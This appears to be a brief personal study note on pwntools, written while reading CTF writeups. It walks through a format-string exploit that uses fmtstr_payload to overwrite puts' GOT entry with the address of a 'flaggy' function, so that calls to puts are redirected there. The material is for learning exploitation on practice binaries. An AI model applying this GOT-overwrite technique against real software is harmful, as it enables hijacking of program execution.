Stuff I learned about pwntools while reading writeups.

- Basic setup

  ```python
  from pwn import *        # pwntools: ELF, process, fmtstr_payload, ...

  elf = ELF("./binary")    # parse the target binary (symbols, GOT, PLT)
  p = elf.process()        # start it as a tube we can send to / receive from
  ```
- The pwntools `ELF` class has built-in lookups that make it easy to get the address of `puts`' GOT entry and of some function X in the binary (here `flaggy`).

  ```python
  puts_got = elf.got["puts"]              # address of the GOT slot for puts
  flaggy_address = elf.symbols["flaggy"]  # address of the function we want called instead
  ```
- `fmtstr_payload` takes two parameters. The first is the offset: the argument position at which the start of your buffer is reached in the format string. The second is a dictionary of writes: the keys are the addresses you wish to write to, and the values are what you want written there.

  ```python
  # build a format string that writes flaggy_address into puts' GOT slot
  payload = fmtstr_payload(4, {puts_got: flaggy_address})
  p.sendline(payload)      # after this, the next call to puts() lands in flaggy
  ```